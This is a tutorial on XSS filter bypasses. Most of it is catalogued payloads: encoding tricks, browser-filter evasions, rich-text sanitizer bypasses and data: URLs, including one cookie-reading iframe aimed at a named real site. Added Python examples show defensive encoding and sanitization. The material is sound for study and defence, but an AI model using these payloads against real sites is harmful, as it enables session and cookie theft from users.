Bypass techniques in cross-site testing and exploitation

Source: Internet
Author: User

Contents

Bypassing characters
  Quotation marks
  Angle brackets
  Brackets
Bypassing filters
  IE filter
  Chrome filter
Bypassing rich text
  Bypass rules
  Exploitation skills
References
1.1 Bypassing characters
Generally, security-aware programmers filter input. A common method is to filter key symbols such as "<" or ">", but this alone often fails to prevent attacks. The more secure method is to encode the output using the escaping functions provided by the programming language.

This section mainly studies single-character filtering: quotation marks, angle brackets, and brackets (parentheses).
 
1.1.1 Quotation marks
In cross-site tests, many vectors (that is, attack vectors) do not themselves contain quotation marks, such as the following. However, quotation marks are often needed during exploitation. If quotation marks are filtered, the following measures can be used to bypass the filter.

Vectors:
<script>alert(/ourren_demo/)</script>
<iframe/onload=alert(/ourren_demo/)>
src=x onerror=alert(/ourren_demo/)>
<p onmouseover=alert(/ourren_demo/)>ourren_demo here.</p>
 
1) String.fromCharCode

String.fromCharCode can express the quoted string as character codes, but it must be used together with eval. For example:

<script>alert('ourren_demo')</script>
-----> <script>eval(String.fromCharCode(97,108,101,114,116,40,39,105,110,115,105,103,104,116,45,108,97,98,115,39,41))</script>
(The character codes shown decode to alert('insight-labs').)
 
2) location.hash

Put the content containing quotation marks in location.hash. This can in fact also break through cross-site length limits.

<script>eval(location.hash.slice(1))</script>   with the URL fragment   #alert('A')
 
1.1.2 Angle brackets
Programmers generally filter angle brackets first, simply because it is the easiest thing to do, so angle brackets are the most frequently filtered characters in cross-site filtering. If the input is not echoed inside another tag, there is basically no way to attack. However, if the input is output into an existing tag's attributes, the surrounding tag can be used for the following tests:
 
1) Event functions

Common event functions include onerror, onmouseover and onload (the new HTML5 tags are also worth attention). When necessary, fuzz the JavaScript event handlers.

?1234 src=x onerror=alert(/ourren_demo/)>
<p onmouseover=alert(/ourren_demo/)>ourren_demo here.</p>
<frameset onload=alert(/ourren_demo/)>
<body onload=alert(/ourren_demo/)>
 
2) style and expression

Use the tag's style attribute for cross-site (only IE succeeded in testing, and the filter must be taken into account).

<div style="width:expression(alert('ourren_demo'));">
 
3) JavaScript pseudo-protocol

Bypass via the javascript: pseudo-protocol.

src=javascript:alert('ourren_demo')>
(IE only)
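The following Python script is an added example (not code from the original article) illustrating the point made at the start of 1.1 and again in 1.1.2: deleting "<" and ">" from the input does nothing for a value that is echoed inside an attribute, whereas entity-encoding the value for its output context (here with Python's html.escape) keeps both the body text and the attribute intact. The template strings, the input name and the helper names are assumptions made for the demonstration; the two sample inputs are constructed from the vectors quoted above, and the outcome is judged by feeding the rendered markup to a parser rather than by reading the string.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs, copied from the vectors quoted on this page:
# one for the HTML body context, one that tries to break out of an attribute.
BODY_VECTOR = "<script>alert(/ourren_demo/)</script>"
ATTR_VECTOR = '" src=x onerror=alert(/ourren_demo/)>'


def strip_angle_brackets(value):
    """The weak input filter the text describes: delete every '<' and '>'."""
    return value.replace("<", "").replace(">", "")


def render_stripped(name):
    """Hypothetical template that trusts bracket stripping alone.
    The value also lands inside an attribute, which stripping does not protect."""
    safe = strip_angle_brackets(name)
    return f'<p>Hello {safe}</p><input name="user" value="{safe}">'


def render_encoded(name):
    """Same template, but the value is entity-encoded for the context it lands in.
    html.escape(quote=True) turns & < > " ' into references, so neither the
    body text nor the attribute value can be closed early by the input."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello {safe}</p><input name="user" value="{safe}">'


class _InputAttributes(HTMLParser):
    """Collects the attribute names a parser sees on the <input> tag."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.names.extend(name for name, _ in attrs)


def input_attribute_names(rendered_html):
    """Parse the rendered page and return the attribute names found on <input>,
    so the result is decided by a parser, not by eyeballing the string."""
    parser = _InputAttributes()
    parser.feed(rendered_html)
    parser.close()
    return parser.names


if __name__ == "__main__":
    for label, render in (("stripped", render_stripped), ("encoded", render_encoded)):
        page = render(ATTR_VECTOR)
        print(f"{label:9s} input attributes: {input_attribute_names(page)}")
        print(f"          {page}")
```

With the stripped template the parser reports src and onerror as attributes of the input element, because the leading quotation mark closed the value attribute; with the encoded template the only attributes are name and value, and the body vector comes out as &lt;script&gt;... text.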
 
1.1.3 Brackets

If brackets (parentheses) are filtered or cannot be injected, perform the following tests:

1) External files

Use src to include an external file and place the code in that file (the file extension need not be .js).
<script src='1.js'></script><script src='2.jpg'></script>
 
2) Hex and dec encoding

Use hexadecimal or decimal character references.

<div style="&#119&#105&#100&#116&#104&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#101&#114&#39&#41&#41">xsser</div>
 
1.2 Bypassing filters
In view of the increasingly serious cross-site problem, browser vendors have introduced their own cross-site filters as part of browser security. However, these filters basically only cover reflected cross-site.

Different browsers defend differently. Against reflected cross-site, Firefox has almost no defense, while IE and Chrome each have their own mechanism that is difficult to bypass. Here we mainly summarize some published bypasses.
 
1.2.1 IE filter
Internet Explorer has supported an XSS Filter since Internet Explorer 7. The overall architecture is described in reference 1, and the regular-expression matching in reference 2. Processing can be divided into three steps: first, heuristic filtering (regular-expression matching) is applied to the HTTP request; if a pattern matches, a dynamic signature is created; if that signature is then found in the HTTP response, the matching part of the response is neutered. Tests were carried out on fully patched IE. Few bypass techniques have been published so far; a summary follows:
 
1) <a href=>

For ordinary reflected cross-site, the <a href> tag combined with "SC%0aript" can bypass the filter, but user interaction is required, so the page has to be dressed up to get the click. The principle is that the page linked from the output page is in the same domain, so no filtering is triggered; if the address in href were on a different domain, filtering would be triggered.

<a href="xss.php?a=<SC%0aript>alert(/ourren_demo/)</script>"><div style="position:absolute;left:0px;top:0px;height:1000px;width:1000px;padding:1em;background:black;text-align:center;">click to continue</div></a>
 
2) UTF-7

Inject the code through a UTF-7 BOM; on fully patched IE this only succeeds when the response header declares the charset as utf-7. See article 3.

%2BACIAPgA8-script%2BAD4-alert%28/ourren_demo/%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
 
3) Flash

Use an iframe to embed the Flash XSS file hosted on www.A.com into a page under the domain www.B.com. When the victim opens www.B.com, we can obtain their cookies for www.A.com. See document 8.

The test code is as follows (IE):
<iframe/src="http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>

In Chrome the browser may crash; the following code can be used instead.

<iframe/src="http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
 
1.2.2 Chrome filter
The XSS filtering rules in Chrome differ considerably from those in IE, and also differ between Chrome versions. See articles 4 and 5.

1) data: protocol

vuln=<a href="javascript:alert(document.cookie);">click</a>
// intercepted --> rewritten to
<a href="javascript:void(0)">click</a>
// bypass
vuln=<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnSGVsbG8gd29ybGQhJyk8L3NjcmlwdD4=">click</a> --> OK
 
1.3 Bypassing rich text
Common rich-text features include message boards, blog posts and e-mail. Compared with general cross-site analysis, the existing tags can be used for testing and analysis. Generally there are two filtering mechanisms, blacklist and whitelist, and both are essentially based on regular-expression matching. Therefore, during testing we compare the input with the output and then make targeted changes.

Common test process: enter common tags and events --> check which tags survive the filter --> modify or analyze attributes

Tags: object, applet, base, link, meta, import, embed, vmlframe, iframe, script, style, isindex, form, textarea

Characters: javascript:, vbscript:

Events: onload, onerror, on*
 
1.3.1 Bypass rules
This section classifies some common transformation rules; in actual tests they are combined in various ways.

1) Non-recursive filtering

Much rich-text filtering removes keywords but does not filter recursively, so what is left after filtering forms a new tag. For example:

<ifra<iframe>me>                 --- filter <iframe> --->               <iframe>
<s<script>cript></s</script>cript>   --- filter <script> and </script> --->   <script></script>
 
2) Encoding

Hexadecimal and decimal encoding (CSS escapes and HTML character references) can be used to bypass keyword matching. Since expression is only executed by IE, this is limited to IE.

<div style="width:expression(alert(/ourren_demo/))">ourren_demo</div>
<div style="width:\0065xpression(alert(/ourren_demo/))">ourren_demo</div>   // two different encodings
<div style="width:\0065xpressio\6e(alert(/ourren_demo/))">ourren_demo</div>
<div style="&#119&#105&#100&#116&#104&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#101&#114&#39&#41&#41">xsser</div>
 
3) Special characters

Insert tabs, line feeds or other whitespace, or a CSS comment "/**/", into the constructed vector to bypass keyword matching; this is basically limited to IE.

src="java{TAB}scr{TAB}ipt:alert(/ourren_demo/)">
(two tab characters, shown here as {TAB}; IE6)
<div style="width:exp/*****/ression(alert(/ourren_demo/))">ourren_demo</div>
(IE)
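The normalization below is an added example, not part of the original article, showing the defender's side of 1.1.3 (2) and 1.3.1 (2) and (3): a filter that matches keywords against the raw attribute value misses the entity-encoded, CSS-escaped, comment-split and whitespace-split forms shown above, while the same keyword check applied after canonicalizing the value (decode character references, decode CSS hex escapes, drop CSS comments, strip whitespace and NUL, lower-case) catches all of them. The function names, the marker list and the sample values are assumptions constructed from the vectors on this page; the CSS escape rule (backslash, one to six hex digits, one optional whitespace character) is the one the CSS syntax defines.

```python
import html
import re

# CSS escape: backslash, 1-6 hex digits, optionally followed by one whitespace char
# ("\0065" -> "e", "\6e " -> "n"). This is the rule from the CSS syntax specification.
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?")
# CSS comment, which the browser drops inside a style value ("exp/**/ression").
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Keywords taken from this page that should never survive in a style or URL attribute.
DANGEROUS_MARKERS = ("expression(", "javascript:", "vbscript:")


def naive_keyword_match(value):
    """The weak check: look for the markers in the raw (only lower-cased) value."""
    lowered = value.lower()
    return any(marker in lowered for marker in DANGEROUS_MARKERS)


def normalize_attribute(value):
    """Canonicalize an attribute value the way a lenient browser ends up reading it:
    decode HTML character references, decode CSS hex escapes, drop CSS comments,
    strip whitespace and NUL bytes, and lower-case the result."""
    text = html.unescape(value)  # handles &#101; &#x65; and &#101 with no semicolon
    text = CSS_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = CSS_COMMENT.sub("", text)
    text = re.sub(r"[\s\x00]+", "", text)
    return text.lower()


def attribute_is_dangerous(value):
    """True if any marker appears once the value has been normalized, whatever encoding was used."""
    normalized = normalize_attribute(value)
    return any(marker in normalized for marker in DANGEROUS_MARKERS)


# Constructed samples, built from the vectors quoted on this page.
SAMPLES = {
    "plain":    "width:expression(alert(/ourren_demo/))",
    "css_hex":  "width:\\0065xpressio\\6e(alert(/ourren_demo/))",
    "entities": "&#119&#105&#100&#116&#104&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110"
                "&#40&#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#101&#114&#39&#41&#41",
    "comment":  "width:exp/*****/ression(alert(/ourren_demo/))",
    "tabs":     "java\tscr\tipt:alert(/ourren_demo/)",
    "benign":   "width:100px;color:#ff0000",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:9s} naive={naive_keyword_match(raw)!s:5s} "
              f"normalized={attribute_is_dangerous(raw)!s:5s} -> {normalize_attribute(raw)}")
```

The naive check flags only the plain sample; after normalization every encoded variant reduces to the same string and is flagged, while the benign declaration is left alone. Decoding before matching is the general rule this illustrates: compare against what the browser will execute, not against the bytes the user typed.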
 
4) data: protocol

The data attribute of the object tag can carry base64-encoded content through the data: protocol to bypass keyword matching, and the object tag is often overlooked.

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=">
 
5) HTML5

Using new HTML5 tags or attributes to bypass filters is rather demanding in its requirements. For details see reference 6.

New tags: <button>, <video>, <audio>, <article>, <footer>, <nav>

New attributes: autocomplete, autofocus, pattern, etc.

<input onfocus=write(1) autofocus>
<video poster=javascript:alert(1)//></video>
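As an added example (not the article's own code) for 1.3 and the rules in 1.3.1 (1), (4) and (5), here is a small allowlist sanitizer built on Python's html.parser. Because it rebuilds the output from parsed tokens instead of deleting substrings, the non-recursive problem from (1) cannot arise: "<ifra<iframe>me>" is tokenized as one unknown tag and dropped, and any "<" left in text is entity-encoded on the way out. Its href check rejects javascript:, vbscript: and data: URLs (covering (4) and the data: case in 1.2.2) after the parser has already decoded character references, and tags or attributes outside the allowlist, such as onfocus and autofocus from (5), never reach the output. The allowlist contents, the chosen tag names and the sample inputs are assumptions made for this demonstration.

```python
import html
import re
from html.parser import HTMLParser

# Hypothetical allowlist for a comment box: tag -> attributes permitted on it.
ALLOWED = {
    "p": set(), "b": set(), "i": set(), "em": set(), "strong": set(), "br": set(),
    "a": {"href", "title"},
}
VOID_TAGS = {"br"}
# Elements whose text content is dropped together with the element itself.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


def url_is_safe(value):
    """Accept http(s)/mailto or relative URLs; reject javascript:, vbscript:, data: and any
    other scheme. Control characters and whitespace are removed first (java<TAB>script:);
    character references (&#106;avascript:) were already decoded by the parser."""
    cleaned = "".join(ch for ch in value if ord(ch) > 32).lower()
    if cleaned.startswith(SAFE_SCHEMES):
        return True
    head = re.split(r"[/?#]", cleaned, maxsplit=1)[0]  # text before any path/query/fragment
    return ":" not in head                              # no scheme present -> relative URL


class AllowlistSanitizer(HTMLParser):
    """Re-emit only allowlisted tags and attributes; escape every text node."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_depth = 0  # >0 while inside an element whose content is discarded

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.drop_depth += 1
            return
        if tag not in ALLOWED or self.drop_depth:
            return
        kept = []
        for name, value in attrs:
            # Allowlist decides; the on* test is belt-and-braces in case the allowlist grows.
            if name not in ALLOWED[tag] or name.startswith("on"):
                continue
            if name == "href" and not url_is_safe(value or ""):
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.drop_depth = max(0, self.drop_depth - 1)
        elif tag in ALLOWED and tag not in VOID_TAGS and not self.drop_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    """Return the allowlisted rendering of an untrusted HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# Constructed inputs built from the vectors quoted on this page.
SAMPLES = [
    "<ifra<iframe>me>",
    "<s<script>cript>alert(1)</script>",
    '<a href="javascript:alert(document.cookie);">click</a>',
    '<a href="&#106;avascript:alert(1)">click</a>',
    '<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnSGVsbG8gd29ybGQhJyk8L3NjcmlwdD4=">click</a>',
    "<input onfocus=write(1) autofocus><video poster=javascript:alert(1)//></video>",
    '<p>Hello <b>world</b>, see <a href="https://example.com/?q=1">this</a></p>',
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(f"{raw!r}\n  -> {sanitize(raw)!r}")
```

The last sample passes through unchanged, which is the property an allowlist has to keep for the feature to stay usable; everything else loses its tag, its attribute or its content. A blacklist that strips "<iframe>" as a substring cannot give the same guarantee, because its output is again a string that the browser parses from scratch.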
 
6) Browser

Consider it from the perspective of how the browser parses markup: analyze the browser's parsing in depth and then refine the vectors accordingly. A few such vectors:

// IE conditional comment
<!--[if IE]> width=0 height=0 onerror=alert(/ourren_demo/)><![endif]-->
<comment> src="</comment> src=x onerror=alert(/ourren_demo/)//">
(IE)
 
1.3.2 Exploitation skills
In actual use we often run into other problems, such as code that loops endlessly and insufficient length. These are summarized below:

1) expression

Because the expression attribute is special (it is only supported by Internet Explorer) and its execution is equivalent to an eval that runs endlessly, and because the style attribute cannot contain the ";" character, several JavaScript statements cannot simply be chained together. Therefore the following statement is constructed:

<div style="xss:ex/**/pre/**/ssion(eval(xss));" xss="var then=new Date();then.setTime(then.getTime()+10*1000);if(document.cookie.indexOf('cookie1=')==-1){document.cookie='cookie1=RAY;expires='+then.toGMTString();alert(/ourren_demo/);}">
This sets a cookie that expires after 10 seconds; the other statements or functions to run are placed inside that cookie check.
The same can be achieved through the window object:
<div style="width:expression((window.x==1)?'':(window.x=1,alert(/ourren_demo/)))">xsser</div>
 
2) Length limit

Reference 7 describes in detail how to break through the XSS character-count limit to execute arbitrary JS code.
Of course, in HTML5 browsers local storage can also be used.
 
References
1. http://blogs.technet.com/b/srd/archive/2008/08/18/ie-8-xss-filter-architecture-implementation.aspx
2. Abusing Internet Explorer 8's XSS Filters (PDF)
3. www.2cto.com/Article/201111/109867.html
4. www.2cto.com/Article/201110/109039.html
5. www.2cto.com/Article/201110/109035.html
6. http://html5sec.org/
7. http://mongoidan.org/pstzine/012703/txt/pstzine_0x03_0x04.txt
8. www.2cto.com/Article/201208/149167.html
 
